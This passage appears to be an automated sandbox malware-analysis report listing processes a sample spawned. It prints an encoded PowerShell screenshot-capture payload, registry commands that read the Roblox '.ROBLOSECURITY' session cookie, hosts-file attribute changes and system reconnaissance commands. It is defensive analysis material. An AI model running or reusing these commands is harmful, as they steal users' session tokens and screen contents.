Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	02:38:12
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	02:38:13
Start date:	13/12/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff6e4720000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	02:38:13
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6a1c50000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	02:38:13
Start date:	13/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Imagebase:	0x7ff6f3ac0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	02:38:13
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	02:38:15
Start date:	13/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline"
Imagebase:	0x7ff78ab90000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	02:38:15
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	02:38:15
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	02:38:15
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8132, Parent PID: 6404

General

Target ID:	73
Start time:	02:38:15
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	02:38:15
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	02:38:15
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	02:38:15
Start date:	13/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA7D9.tmp" "c:\Users\user\AppData\Local\Temp\vebzhwcp\CSCD4517BE1E6C4428293E27562A6116680.TMP"
Imagebase:	0x7ff6b2650000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	02:38:15
Start date:	13/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib -r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff7451f0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	02:38:15
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6a1c50000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	02:38:15
Start date:	13/12/2024
Path:	C:\Windows\System32\getmac.exe
Wow64 process (32bit):	false
Commandline:	getmac
Imagebase:	0x7ff696200000
File size:	90'112 bytes
MD5 hash:	7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	02:38:17
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	02:38:17
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2028, Parent PID: 5304

General

Target ID:	82
Start time:	02:38:17
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	02:38:17
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	02:38:17
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6a1c50000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	02:38:17
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	02:38:17
Start date:	13/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff7451f0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	02:38:17
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	02:38:17
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	02:38:17
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4592, Parent PID: 7336

General

Target ID:	90
Start time:	02:38:17
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	02:38:18
Start date:	13/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff7e2d20000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	02:38:18
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7324, Parent PID: 4620

General

Target ID:	93
Start time:	02:38:18
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	02:38:18
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6a1c50000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	02:38:18
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3904, Parent PID: 1248

General

Target ID:	96
Start time:	02:38:18
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	02:38:19
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6a1c50000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	02:38:19
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	02:38:19
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
